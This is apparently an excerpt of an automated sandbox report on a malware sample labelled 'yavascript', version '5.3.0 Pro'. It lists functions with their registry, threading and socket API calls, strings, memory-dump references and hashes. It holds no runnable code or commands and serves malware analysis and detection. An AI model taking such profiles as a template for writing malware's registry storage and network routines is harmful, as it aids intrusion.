                                                  control_flow_graph 1363 4126d2-4126e9 RegCreateKeyA 1364 412722 1363->1364 1365 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1363->1365 1367 412724-412730 call 401eea 1364->1367 1365->1367
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                  • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                  • RegCloseKey.ADVAPI32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: HgF$pth_unenc
                                                  • API String ID: 1818849710-3662775637
                                                  • Opcode ID: 71eb531204d8fd0b136a499f7559ae8f43f87fb45ec2430c7633c83b17c543f2
                                                  • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                  • Opcode Fuzzy Hash: 71eb531204d8fd0b136a499f7559ae8f43f87fb45ec2430c7633c83b17c543f2
                                                  • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                  Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                  • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 31a8c67cc79ba41f7da5571d95af1125fce36a06f75261ce7f77750381094343
                                                  • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                  • Opcode Fuzzy Hash: 31a8c67cc79ba41f7da5571d95af1125fce36a06f75261ce7f77750381094343
                                                  • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                  Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                  • Opcode Fuzzy Hash: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                  Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                  • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                  • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                  • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                  • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                  • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                  Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                  • RegCloseKey.KERNEL32(?), ref: 00412500
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                  Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                  • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                  • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                  • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                  • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                  Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: xAG
                                                  • API String ID: 176396367-2759412365
                                                  • Opcode ID: ff637472b7ef91eb79cf1c791d23dde74da6086b31a6c5428193f8d367aac764
                                                  • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                  • Opcode Fuzzy Hash: ff637472b7ef91eb79cf1c791d23dde74da6086b31a6c5428193f8d367aac764
                                                  • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                  Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                  • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                  • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                  • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                  Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                  • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                  • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                  • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                  Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                  • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                  • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                  • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                  Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000011.00000002.4623907696.0000000000473000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000011.00000002.4623907696.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_400000_yavascript.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                  • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                  • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                  • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36